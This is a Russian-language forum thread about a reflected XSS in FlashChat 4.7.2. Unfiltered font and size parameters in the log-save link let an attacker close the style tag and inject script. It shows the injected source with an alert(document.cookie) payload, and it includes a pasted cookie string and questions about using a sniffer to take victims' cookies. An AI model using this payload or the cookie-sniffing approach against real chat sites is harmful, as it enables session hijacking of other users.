Пришлось мне потеститьFlashChat v 4.7.2 Сам движок написан неплохо, все входящие символы в окно чата фильтруються. В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс Code: <style type="text/css"> <!-- BODY { font-family: [B][COLOR=White]Arial[/COLOR][/B], Verdana, Arial, Helvetica, sans-serif; font-size: [B][COLOR=White]13[/COLOR][/B]px; } --> </style> Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>. Вот xss: Теперь иходный код примет такой вид Code: <style type="text/css"> <!-- BODY { font-family: Arial, Verdana, Arial, Helvetica, sans-serif; font-size: 13px;}--></style>[B][COLOR=White]<script>alert(document.cookie)</script>[/COLOR][/B]<!-- } --> </style> А вот и куки =) html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте
a kak panimat vot eta ? Code: 357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|utmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684.1171122060.2; __utmc=125134932; __utmb=125134932 no chat nawerna ciutka perepisan
я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.
Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.
По моему нет принципиальных отличий от других XSS, зачем писать видео? Посмотри про использование пассивных XSS в других движках - меняется только ссылка с javascript'ом, если для тебя главное - посмотреть, как использовать сниффер - нет разницы.
Затем что я не работал никогда с Xss, и поэтому, хоть особых отличий нету, но все таки они будут, хоть малейшие. И чтобы не сидеть и не думать, что сделал не так, хотелось бы посмотреть видео, все доступно.